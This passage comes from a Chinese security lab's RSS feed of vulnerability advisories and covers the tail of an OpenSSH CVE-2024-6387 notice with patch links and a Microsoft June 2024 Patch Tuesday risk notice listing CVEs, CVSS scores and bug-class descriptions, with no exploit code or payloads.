14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><a href="https://www.openssh.com/releasenotes.html" target="_blank">https://www.openssh.com/releasenotes.html</a></span></section><section style="line-height: 1.6em;text-align: justify;margin: 0px 0px 24px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><a href="https://github.com/openssh/openssh-portable/releases/tag/V_9_8_P1" target="_blank">https://github.com/openssh/openssh-portable/releases/tag/V_9_8_P1</a></span></section><section style="line-height: 1.6em;text-align: justify;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);">Linux发行版可根据各个发行版漏洞公告页面的修复信息将OpenSSH升级到Linux发行版官方编译的安全版本。</span></section><section style="line-height: 1.6em;text-align: justify;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);">Debian漏洞公告：</span></section><section style="line-height: 1.6em;text-align: justify;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><a href="https://security-tracker.debian.org/tracker/CVE-2024-6387" target="_blank">https://security-tracker.debian.org/tracker/CVE-2024-6387</a></span></section><section style="line-height: 1.6em;text-align: justify;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);">Ubuntu漏洞公告：</span></section><section style="line-height: 1.6em;text-align: justify;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><a href="https://ubuntu.com/security/CVE-2024-6387" target="_blank">https://ubuntu.com/security/CVE-2024-6387</a></span></section><section style="line-height: 1.6em;text-align: justify;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);">RedHat漏洞公告：</span></section><p style="line-height: 1.6em;text-align: justify;margin: 0px 0px 16px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><a href="https://access.redhat.com/security/cve/cve-2024-6387" target="_blank">https://access.redhat.com/security/cve/cve-2024-6387</a></span></p><section style="margin-top: 24px;margin-bottom: 0px;letter-spacing: 0.578px;text-wrap: wrap;"><strong style="color: rgb(62, 62, 62);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;letter-spacing: 0.54px;"><span style="font-size: 24px;line-height: 36px;">0x04 参考链接</span></strong><br/></section><h2 style="text-wrap: wrap;color: rgb(62, 62, 62);line-height: 24px;letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;break-after: auto;background-color: rgb(255, 255, 255);"></h2><hr style="text-wrap: wrap;color: rgb(62, 62, 62);letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;background-color: rgb(255, 255, 255);"/><section style="margin-top: 16px;margin-bottom: 8px;"><span style="font-size: 14px;letter-spacing: 0.578px;text-indent: 0em;">1、OpenSSH漏洞公告</span></section><p style="line-height: 1.6em;text-align: justify;margin: 0px 0px 8px;text-indent: 0em;"><span style="letter-spacing: 0.578px;text-decoration: none;font-size: 14px;"><a href="https://www.openssh.com/releasenotes.html#9.8p1" target="_blank">https://www.openssh.com/releasenotes.html#9.8p1</a></span></p><section style="line-height: 1.6em;text-align: justify;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none;">2、漏洞发现者披露文章</span></section><section style="line-height: 1.6em;text-align: justify;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none;"><a href="https://blog.qualys.com/vulnerabilities-threat-research/2024/07/01/regresshion-remote-unauthenticated-code-execution-vulnerability-in-openssh-server" target="_blank">https://blog.qualys.com/vulnerabilities-threat-research/2024/07/01/regresshion-remote-unauthenticated-code-execution-vulnerability-in-openssh-server</a></span></section><section style="line-height: 1.6em;text-align: justify;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none;"><a href="https://www.qualys.com/2024/07/01/cve-2024-6387/regresshion.txt" target="_blank">https://www.qualys.com/2024/07/01/cve-2024-6387/regresshion.txt</a></span></section><h2 style="white-space: normal;color: rgb(62, 62, 62);line-height: 24px;letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;max-width: 100%;break-after: auto;background-color: rgb(255, 255, 255);margin-top: 24px;box-sizing: border-box !important;"><strong style="max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span style="max-width: 100%;font-size: 24px;line-height: 36px;box-sizing: border-box !important;overflow-wrap: break-word !important;">0x05 声明</span></strong><strong style="max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"></strong></h2><hr style="white-space: normal;color: rgb(62, 62, 62);letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;max-width: 100%;background-color: rgb(255, 255, 255);box-sizing: border-box !important;"/><p style="white-space: normal;text-align: left;line-height: 25.5px;text-indent: 32px;margin-bottom: 0px;"><br/></p><p style="color: rgb(53, 53, 53);font-family: &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei&#34;, 黑体, Arial, sans-serif;font-size: 14px;text-align: left;white-space: normal;background-color: rgb(255, 255, 255);margin-bottom: 0px;"><span style="font-size: 14px;">天融信阿尔法实验室拥有对此公告的修改和解释权，如欲转载，必须保证此公告的完整性。由于传播、利用此公告而造成的任何后果，均由使用者本人负责，天融信阿尔法实验室不为此承担任何责任。</span></p><section style="margin-bottom: 0px;text-wrap: wrap;"><section style="margin-top: 30px;margin-bottom: 10px;"><section style="padding: 10px;display: inline-block;width: 578px;vertical-align: top;border-style: dashed;border-width: 2px;border-radius: 11px;border-color: rgb(141, 186, 190);background-color: rgba(244, 242, 240, 0.6);"><section><section style="color: rgb(115, 120, 121);"><p><span style="font-size: 14px;">天融信阿尔法实验室成立于2011年，一直以来，阿尔法实验室秉承“攻防一体”的理念，汇聚众多专业技术研究人员，从事攻防技术研究，在安全领域前瞻性技术研究方向上不断前行。作为天融信的安全产品和服务支撑团队，阿尔法实验室精湛的专业技术水平、丰富的排异经验，为天融信产品的研发和升级、承担国家重大安全项目和客户服务提供强有力的技术支撑。<br/></span></p></section></section></section></section></section><section style="margin-bottom: 0px;"><section powered-by="xiumi.us"><section style="margin-top: 30px;margin-bottom: 10px;text-align: center;"><section style="padding: 5px;display: inline-block;width: 549.094px;vertical-align: top;box-shadow: rgb(185, 185, 185) 1.41421px 1.41421px 6px;"><section powered-by="xiumi.us"><section style="margin-top: -20px;margin-bottom: 5px;"><p style="vertical-align: middle;display: inline-block;box-shadow: rgb(0, 0, 0) 0px 0px 0px;"><br/></p></section><section style="margin-top: -20px;margin-bottom: 5px;"><p style="vertical-align: middle;display: inline-block;box-shadow: rgb(0, 0, 0) 0px 0px 0px;"><br/></p></section><section style="margin-top: -20px;margin-bottom: 5px;"><p style="vertical-align: middle;display: inline-block;box-shadow: rgb(0, 0, 0) 0px 0px 0px;"><img class="rich_pages wxw-img" data-imgfileid="100012992" data-ratio="0.06041666666666667" style="vertical-align: middle;width: auto !important;" data-type="png" data-w="480" src="https://wechat2rss.xlab.app/img-proxy/?k=5ba09fbc&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FH6W1QCHf9dGfIEDOlNXXDTqOpRkEkicJakNxM37lzr8eRJRibEfxkwBibg9KpVh6nibXHoG4xC6KyGFtTd4TOe6GyA%2F640%3Fwx_fmt%3Dpng"/></p></section></section><section powered-by="xiumi.us"><section style="margin-top: 10px;margin-bottom: 10px;"><section style="padding-left: 10px;display: inline-block;vertical-align: middle;width: 204.844px;box-shadow: rgb(0, 0, 0) 0px 0px 0px;"><section powered-by="xiumi.us"><section style="margin-top: 10px;margin-bottom: 10px;"><section style="vertical-align: middle;display: inline-block;"><br/></section><section style="vertical-align: middle;display: inline-block;"><img class="rich_pages wxw-img" data-imgfileid="100012993" data-ratio="1" style="vertical-align: middle;width: auto !important;" data-type="jpeg" data-w="344" src="https://wechat2rss.xlab.app/img-proxy/?k=33f7228b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FH6W1QCHf9dGfIEDOlNXXDTqOpRkEkicJawf8nKyKatopPJiaayibAUCvfTVFKfxVDInq2TiaUib6xhmhpLK4Zqscgyg%2F640%3Fwx_fmt%3Djpeg"/></section></section></section></section><section style="display: inline-block;vertical-align: middle;width: 333.156px;"><section powered-by="xiumi.us"><section><section style="font-size: 14px;"><p><span style="font-family: Optima-Regular, PingFangTC-light;font-size: 14px;">天融信</span></p><p><span style="font-family: Optima-Regular, PingFangTC-light;font-size: 14px;">阿尔法实验室</span></p></section></section></section><section powered-by="xiumi.us"><section style="margin-top: 10px;margin-bottom: 10px;"><section style="padding: 5px;display: inline-block;box-shadow: rgb(183, 28, 28) 0px 0px 0px inset;border-style: solid;border-width: 1px;border-radius: 5px;border-color: rgb(66, 66, 66);background-color: rgb(252, 228, 236);"><section powered-by="xiumi.us"><section style="padding-right: 8px;padding-left: 8px;text-align: left;color: rgb(131, 129, 129);font-size: 14px;"><p><span style="font-family: Optima-Regular, PingFangTC-light;font-size: 14px;">长按二维码关注我们</span></p></section></section></section></section></section></section></section></section></section></section></section></section><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="2247496648">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=5e50c053&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzg3MDAzMDQxNw%3D%3D%26mid%3D2247496648%26idx%3D1%26sn%3D34cf6111dc8ff2fca5fb1e2c2b2acd74%26subscene%3D0">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Tue, 02 Jul 2024 14:10:00 +0800</pubDate>
    </item>
    <item>
      <title>【风险提示】天融信关于微软2024年06月安全更新的风险提示</title>
      <link>https://mp.weixin.qq.com/s?__biz=Mzg3MDAzMDQxNw==&amp;mid=2247496633&amp;idx=1&amp;sn=48aa313024aec20eeda560151222e620</link>
      <description>2024年06月12日，天融信阿尔法实验室监测到微软官方发布了06月安全更新。此次更新共修复49个漏洞（不包含2个外部分配漏洞和本月早些时候发布的7个Edge漏洞），其中1个严重漏洞、48个重要漏洞。</description>
      <content:encoded><![CDATA[<p>
原创 <span>天融信应急响应</span> <span>2024-06-12 15:11</span> <span style="display: inline-block;">北京</span>
</p>

<p>2024年06月12日，天融信阿尔法实验室监测到微软官方发布了06月安全更新。此次更新共修复49个漏洞（不包含2个外部分配漏洞和本月早些时候发布的7个Edge漏洞），其中1个严重漏洞、48个重要漏洞。</p>
<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=b9f6448d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FH6W1QCHf9dFAuWicxwmIw9QNBSyN6GrABcSkgTrIxBsgHiaHKWYIddeKgQ7v38EL68obnaSRJjpxDrSOAf34MkIA%2F0%3Fwx_fmt%3Djpeg"/>
</p>


<p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.29259259259259257" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=a7b7e105&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FH6W1QCHf9dFAuWicxwmIw9QNBSyN6GrABpjDae9Wfv6vs4Tg5bETzto4ibjJCEjTWJm0R7fx5lNS9nlpbHtD3Ziag%2F640%3Fwx_fmt%3Dpng"/></p><p style="margin-bottom: 0px;white-space: normal;"><strong style="color: rgb(62, 62, 62);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;letter-spacing: 0.544px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span style="max-width: 100%;font-size: 24px;line-height: 36px;box-sizing: border-box !important;overflow-wrap: break-word !important;">0x00 背景介绍</span></strong><br/></p><hr style="white-space: normal;color: rgb(62, 62, 62);letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;max-width: 100%;background-color: rgb(255, 255, 255);box-sizing: border-box !important;"/><p style="white-space: normal;margin-top: 16px;margin-bottom: 8px;"><span style="color: rgb(0, 0, 0);font-size: 14px;letter-spacing: 0.476px;text-indent: 0em;">2024年06月12日，天融信阿尔法实验室监测到微软官方发布了06月安全更新。此次更新共修复49个漏洞（不包含2个外部分配漏洞和本月早些时候发布的7个Edge漏洞），其中1个严重漏洞(Critical)、48个重要漏洞(Important)。其中权限提升漏洞24个、远程代码执行漏洞18个、信息泄露漏洞3个、拒绝服务漏洞4个。</span><br/></p><section style="line-height: 1.6em;text-align: justify;margin: 8px 0px;text-indent: 0em;"><span style="color: rgb(0, 0, 0);font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgb(0, 0, 0);">本次微软安全更新涉及组件包括：Windows Server Service、Windows Win32K、Windows Kernel-Mode Drivers、Windows Cloud Files Mini Filter Driver、Windows Kernel、Microsoft Streaming Service、Windows Wi-Fi Driver、Microsoft Office等多个产品和组件。</span></section><section style="line-height: 1.6em;text-align: justify;margin: 8px 0px;text-indent: 0em;"><span style="color: rgb(0, 0, 0);font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgb(0, 0, 0);">微软本次修复中，无在野利用与公开披露漏洞。</span></section><section style="line-height: 1.6em;text-align: justify;margin: 8px 0px;text-indent: 0em;"><span style="color: black;font-size: 14px;letter-spacing: 0.034em;text-decoration: none solid rgb(0, 0, 0);"></span></section><section style="line-height: 1.6em;text-align: justify;margin: 16px 0px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><section style="margin-bottom: 0px;letter-spacing: 0.578px;white-space: normal;margin-top: 24px;"><strong style="color: rgb(62, 62, 62);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;letter-spacing: 0.544px;"><span style="font-size: 24px;line-height: 36px;">0x01 </span></strong><span style="font-size: 24px;"><strong style="color: rgb(62, 62, 62);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;letter-spacing: 0.544px;"><span style="font-size: 24px;line-height: 36px;"><strong style="white-space: normal;color: rgb(62, 62, 62);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;letter-spacing: 0.54px;"><span style="font-size: 24px;line-height: 36px;">重点</span></strong><strong style="white-space: normal;color: rgb(62, 62, 62);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;letter-spacing: 0.54px;"><span style="font-size: 24px;line-height: 36px;">漏洞描述</span></strong></span></strong></span><br/></section><hr style="white-space: normal;color: rgb(62, 62, 62);letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;background-color: rgb(255, 255, 255);"/><section style="margin-top: 16px;margin-bottom: 16px;letter-spacing: 0.578px;white-space: normal;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration-style: solid;text-decoration-color: rgba(0, 0, 0, 0.9);">本次微软更新中重点漏洞的信息如下所示。</span></section><section style="line-height: 1.6em;text-align: justify;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><section style="line-height: 1.6em;text-align: justify;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><ul class="list-paddingleft-1" style="list-style-type: square;"><li style="font-weight: bold;"><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><strong><span style="letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);font-size: 16px;">漏洞利用可能性较大的漏洞</span></strong></section></li></ul><table><tbody><tr><td width="123" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">CVE</span><br/></td><td width="329" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">漏洞名称</span><br/></td><td width="65" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">CVSS3.1</span><br/></td></tr><tr><td width="143" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-30080</span></td><td width="349" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">Microsoft消息队列(MSMQ)远程代码执行漏洞</span></td><td width="85" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">9.8/8.5</span></td></tr><tr><td width="143" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-30082</span></td><td width="349" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">Windows Win32k本地权限提升漏洞</span></td><td width="85" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">7.8/6.8</span></td></tr><tr><td width="143" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-30086</span></td><td width="349" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">Windows Win32k本地权限提升漏洞</span></td><td width="85" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">7.8/6.8</span></td></tr><tr><td width="143" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-30087</span></td><td width="349" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">Windows Win32k本地权限提升漏洞</span></td><td width="85" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">7.8/6.8</span></td></tr><tr><td width="143" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-30091</span></td><td width="349" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">Windows Win32k本地权限提升漏洞</span></td><td width="85" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">7.8/7.0</span></td></tr><tr><td width="143" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-30084</span></td><td width="349" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">Windows内核模式驱动本地权限提升漏洞</span></td><td width="85" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">7.0/6.1</span></td></tr><tr><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-35250</span></td><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">Windows内核模式驱动本地权限提升漏洞</span></td><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">7.8/6.8</span></td></tr><tr><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-30085</span></td><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">Windows Cloud Files微过滤器驱动本地权限提升漏洞</span></td><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">7.8/7.0</span></td></tr><tr><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-30088</span></td><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">Windows Kernel本地权限提升漏洞</span></td><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">7.0/6.3</span></td></tr><tr><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-30099</span></td><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">Windows Kernel本地权限提升漏洞</span></td><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">7.0/6.3</span></td></tr><tr><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-30089</span></td><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">Windows流服务本地权限提升漏洞</span></td><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">7.8/6.8</span></td></tr></tbody></table><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><p style="margin-top: 0px;margin-bottom: 8px;text-align: left;"><span style="text-align: justify;font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">CVE-2024-30080：Microsoft消息队列(MSMQ)远程代码执行漏洞</span><br/></span></p></li></ul><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-indent: 0em;">此漏洞是Windows Server服务消息队列(MSMQ)实现中的释放后重用漏洞（CWE-416）。未经身份认证的远程攻击者通过向MSMQ服务器发送特制的恶意MSMQ数据包来利用此漏洞，成功利用此漏洞可以获得在MSMQ服务器端远程执行代码的能力。</span><br/></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">Windows消息队列服务是一个Windows组件，需要启用该服务，才能利用此漏洞。此功能可以通过控制面板添加。您可以检查是否有一个名为Message Queuing的服务正在运行，并且机器上的TCP端口1801正在监听来查看此服务的运行状态。</span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><p style="margin-top: 0px;margin-bottom: 8px;text-align: left;"><span style="text-align: justify;font-size: 14px;letter-spacing: 0.034em;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">CVE-2024-30082、CVE-2024-30086、CVE-2024-30087、CVE-2024-30091：Windows Win32k本地权限提升漏洞</span><br/></span></p></li></ul><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-indent: 0em;">CVE-2024-30082和CVE-2024-30086都是Windows Win32k子系统中的释放后重用漏洞（CWE-416）。经过普通用户身份认证的本地攻击者通过运行特制的程序来利用这些漏洞。成功利用这些漏洞的攻击者可以获得目标系统的SYSTEM权限。</span><br/></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">CVE-2024-30087是Windows Win32k子系统中不正确的输入验证漏洞（CWE-20），CVE-2024-30091是Windows Win32k子系统中的堆溢出漏洞（CWE-122）。经过普通用户身份认证的本地攻击者通过运行特制的程序来利用这些漏洞。成功利用这些漏洞的攻击者可以获得运行受影响应用程序的用户的权限。</span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.034em;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">CVE-2024-30084、CVE-2024-35250：Windows内核模式驱动本地权限提升漏洞</span><br/></span></section></li></ul><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-indent: 0em;">CVE-2024-30084是Windows内核模式驱动中的TOCTOU条件竞争漏洞（CWE-367）。CVE-2024-35250是Windows内核模式驱动中的不可信指针解引用漏洞（CWE-822）。经过普通用户身份认证的本地攻击者通过运行特制的程序来利用这些漏洞。成功利用这些漏洞的攻击者可以获得目标系统的SYSTEM权限。</span><br/></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><p style="margin-top: 0px;margin-bottom: 8px;text-align: left;"><span style="text-align: justify;font-size: 14px;letter-spacing: 0.034em;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">CVE-2024-30085：Windows Cloud Files微过滤器驱动本地权限提升漏洞</span></span></span></span><br/></span></span></p></li></ul><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-indent: 0em;">CVE-2024-30085是Windows Cloud Files微过滤器驱动中的堆溢出漏洞（CWE-122）。经过普通用户身份认证的本地攻击者通过运行特制的程序来利用此漏洞。成功利用此漏洞的攻击者可以获得目标系统的SYSTEM权限。</span><br/></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span><span style="font-size: var(--articleFontsize);letter-spacing: 0.034em;text-align: justify;"></span></section><section style="line-height: 1.6em;text-align: 